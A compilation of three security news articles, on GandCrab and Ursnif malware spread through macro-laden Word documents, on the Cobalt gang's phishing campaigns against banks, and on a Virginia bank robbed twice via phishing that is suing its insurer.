GandCrab ransomware and Ursnif virus spreading via MS Word macros

By: Swati Khandelwal

Security researchers have discovered two separate malware campaigns, one of which is distributing the Ursnif data-stealing trojan and the GandCrab ransomware in the wild, whereas the second one is only infecting victims with Ursnif malware.

Though both malware campaigns appear to be a work of two separate cybercriminal groups, we find many similarities in them. Both attacks start from phishing emails containing an attached Microsoft Word document embedded with malicious macros and then uses Powershell to deliver fileless malware.

Ursnif is a data-stealing malware that typically steals sensitive information from compromised computers with an ability to harvest banking credentials, browsing activities, collect keystrokes, system and process information, and deploy additional backdoors.

Discovered earlier last year, GandCrab is a widespread ransomware threat that, like every other ransomware in the market, encrypts files on an infected system and insists victims to pay a ransom in digital currency to unlock them. Its developers ask payments primarily in DASH, which is more complex to track.

MS Docs + VBS macros = Ursnif and GandCrab Infection

The first malware campaign distributing two malware threats was discovered by security researchers at Carbon Black who located approximately 180 variants of MS Word documents in the wild that target users with malicious VBS macros.

If successfully executed, the malicious VBS macro runs a PowerShell script, which then uses a series of techniques to download and execute both Ursnif and GandCrab on the targeted systems.


Notorious cyber crime gang behind global bank hacking spree returns with new attacks

By: Danny Palmer

hacker hands at work with graphic user interface around

A notorious hacking group that targets financial organisations and is thought to be the perpetrator of cyber attacks against the SWIFT banking network and ATM systems has launched a new campaign targeting employees of two banks.

The Cobalt cyber crime gang is suspected of striking banks in more than 40 countries and potentially making as much as €10 million per heist. It’s estimated the attacks have caused over €1bn in damages.

Despite the suspected leader of the group being arrested as part of a Europol operation in March this year, Cobalt remained active, with security firms detecting new campaigns just weeks after the arrest took place.

Now two more new Cobalt campaigns have been uncovered — this time targeting banks in Eastern Europe and Russia.

The new criminal activity, uncovered by Netscout Arbor, began in mid-August. The two banks being targeted by this latest campaign are NS Bank in Russia and Patria Bank in Romania.

In both cases, phishing emails appear to come from a financial vendor or partner related to the bank, a tactic that is used to trick victims into trusting the origin of the message and the sender.

“In at least one of the campaigns the attackers crafted an email that appeared to come from SEPA Europe (Single Euro Payments Area) with information about expanded coverage,” Richard Hummel, threat intelligence manager at Netscout told ZDNet.

“The recipient of the email was encouraged to click on an embedded link to find more information pertaining to the expanded coverage area.”


Virginian Bank Robbed Twice in Eight Months

By: Phil Muncaster

The perils of phishing emails and cyber-insurance were laid bare this week after news emerged of an American bank that fell victim to hackers twice within eight months and is suing its provider for failing to cover the losses.

The Virginian National Bank of Blacksburg was hit in late May 2016 and again in January 2017 thanks to phishing emails which eventually resulted in the combined theft of $2.4m.

The first attack enabled attackers to install malware on a victim’s PC, allowing them to access the STAR interbank network and disable controls including PINs, daily withdrawal limits and anti-fraud measures, according to journalist Brian Krebs.

The attackers were then able to dispense funds from customer accounts of over half a million dollars to ATMs around the country.

The second attack apparently used a booby-trapped Microsoft Word document to access the bank’s Navigator software, which they used to artificially credit various accounts with $2m before withdrawing funds from ATMs in the same way and deleting the evidence.

Chandu Ketkar, principal consultant at Synopsys, argued that the breaches came from failures of security awareness training, monitoring controls, emergency response, and policy around Office macros.

Ryan Wilk, vice president at NuData Security, added that phishing risk can be mitigated by migrating away from static username/password combinations.

“This is a clear example of why merchants and financial institutions are moving past the user’s personally identifiable information (PII) as a way to authenticate them and incorporating multi-layered solutions with passive biometrics and behavioral analytics,” he added. “These technologies thwart the reuse of data by fraudsters and, instead, verify users based on their behavioral information.”

In a further twist, the bank is now suing its provider, Everest National Insurance Company, for failing to pay out.